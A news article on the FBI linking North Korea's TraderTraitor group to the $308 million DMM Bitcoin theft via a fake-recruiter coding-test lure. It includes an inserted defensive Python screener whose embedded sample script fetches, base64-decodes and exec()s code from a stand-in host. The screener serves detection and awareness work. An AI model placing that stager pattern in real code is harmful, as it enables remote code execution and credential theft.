FBI Links DMM Bitcoin Hack to North Korean TraderTraitor Group

The latest investigation suggests that North Korean hackers, known as the TraderTraitor group, were behind the Japanese crypto exchange DMM Bitcoin hack. The TraderTraitor hackers reportedly have close ties with the infamous Lazarus Group.

Back in May, the incident saw the exchange lose 4,502 Bitcoin, valued at $308 million.

The Hack That Caused DMM Bitcoin to Shut Down

The DMM Bitcoin exploit was one of the largest crypto hacks of the year. The significant losses and failed retrieval efforts ultimately caused the exchange to shut down earlier this month.

Initially, the attack was attributed broadly to the infamous Lazarus Group, but US and Japanese officials now believe a more specific North Korean unit, tracked as the TraderTraitor group, carried it out.

According to the FBI, the hackers used targeted social engineering against Ginco, a Japanese crypto wallet software company. In March, an attacker posing as a recruiter on LinkedIn contacted a Ginco employee and sent them a link to a malicious Python script hosted on GitHub, disguised as a pre-employment coding test.

The employee copied the code to their personal GitHub page and ran it, which compromised their system. The attackers then used the stolen session cookie information to impersonate the employee.

By late May, that impersonation gave the attackers access to Ginco's unencrypted internal communications system. From there they manipulated a legitimate transaction request from a DMM Bitcoin employee, and the 4,502 Bitcoin ended up in wallets the attackers controlled.
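As an added example, not code from the article, the FBI statement, or Ginco, the following is a small static screener for the kind of "coding test" script described above. It parses an untrusted Python file with the standard ast module and flags the stager pattern (a network fetch feeding exec() or eval(), base64 decoding of a payload, process spawning) without executing anything. The embedded sample script, its fizzbuzz task, and the example.invalid URL are constructed for illustration and are not the actual lure.

```python
import ast

# Constructed sample "pre-employment test" in the style of a recruiter lure:
# the visible task is harmless, but a helper quietly fetches, decodes and
# exec()s a remote stage. This is NOT the real DMM/Ginco lure.
SAMPLE_TEST = '''
import base64, urllib.request

def fizzbuzz(n):
    return ["FizzBuzz" if i % 15 == 0 else "Fizz" if i % 3 == 0
            else "Buzz" if i % 5 == 0 else str(i) for i in range(1, n + 1)]

def _init():
    # hypothetical stager: fetch and run code from a hard-coded URL
    src = urllib.request.urlopen("http://example.invalid/stage").read()
    exec(base64.b64decode(src))

_init()
print(fizzbuzz(15))
'''

# Constructed benign control: a plain coding exercise with no stager.
BENIGN_TEST = "def add(a, b):\n    return a + b\n"

DYNAMIC_EXEC = {"exec", "eval", "compile", "__import__"}
NETWORK_MODULES = {"urllib", "requests", "socket", "http"}
PROCESS_CALLS = {"os.system", "os.popen", "subprocess.run",
                 "subprocess.Popen", "subprocess.call", "subprocess.check_output"}
DECODERS = {"base64.b64decode", "codecs.decode", "zlib.decompress"}


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None (e.g. call on a call)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def screen_script(source: str) -> list[str]:
    """Statically inspect an untrusted Python script and return findings.

    Nothing in the script is executed; only the syntax tree is walked.
    """
    findings = []
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_MODULES:
                    findings.append(f"line {node.lineno}: imports network module {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in NETWORK_MODULES:
                findings.append(f"line {node.lineno}: imports network module {node.module}")
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in DYNAMIC_EXEC:
                # exec/eval of anything but a string literal is the stager pattern:
                # the code being run is not visible in the file under review.
                arg = node.args[0] if node.args else None
                if not isinstance(arg, ast.Constant):
                    findings.append(f"line {node.lineno}: {name}() on non-literal argument")
            elif name in PROCESS_CALLS:
                findings.append(f"line {node.lineno}: spawns a process via {name}()")
            elif name in DECODERS:
                findings.append(f"line {node.lineno}: decodes payload via {name}()")
            elif name and name.split(".")[0] in NETWORK_MODULES:
                findings.append(f"line {node.lineno}: network call {name}()")
    return findings


def verdict(source: str) -> str:
    """'review' if the script shows any stager indicator, else 'ok'."""
    return "review" if screen_script(source) else "ok"


if __name__ == "__main__":
    for label, src in (("sample lure", SAMPLE_TEST), ("benign", BENIGN_TEST)):
        print(f"{label}: {verdict(src)}")
        for f in screen_script(src):
            print("  ", f)
```

This is a triage aid, not a sandbox: a determined attacker can hide the same behaviour behind getattr tricks or a native dependency, so any recruiter-supplied test should still be run only in a throwaway VM that has no access to the developer's browser profile, SSH keys or session cookies, which is exactly the material the attackers in this case went on to abuse.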

Despite efforts to compensate users by purchasing replacement Bitcoin, the financial impact proved insurmountable. Ultimately, the company announced its closure and plans to transfer its accounts to SBI VC Trade by March 2025.

North Korea Continues to be a Persistent Threat for the Crypto Industry

This attack highlights the persistent threat that North Korean hacking groups pose to the crypto industry. In 2024 alone, these groups stole $1.34 billion in cryptocurrency, about 61% of all crypto stolen globally that year.

Amount of Cryptocurrencies Stolen by North Korean Hackers Over the Years. Source: Chainalysis

In July, the stolen funds were laundered through Huione Guarantee, an online marketplace operating in Cambodia. According to Chainalysis, the platform has facilitated pig butchering and other scam operations, with associated transaction volumes estimated at around $49 billion.

In December, Cambodia responded with a regulatory crackdown, blocking access to 16 crypto exchanges, including major platforms like Binance, Coinbase, and OKX.

“Crypto folks (hopefully) already know that Lazarus is one of the most prevalent threat actors targeting this industry. They rekt more people, companies, protocols than anyone else. But it’s good to know exactly how they get in. Because another smart contract audit won’t save you,” wrote MetaMask security expert Taylor Monahan.

Overall, the DMM Bitcoin breach ranks as one of Japan’s largest crypto thefts, second only to the $530 million Coincheck hack in 2018.
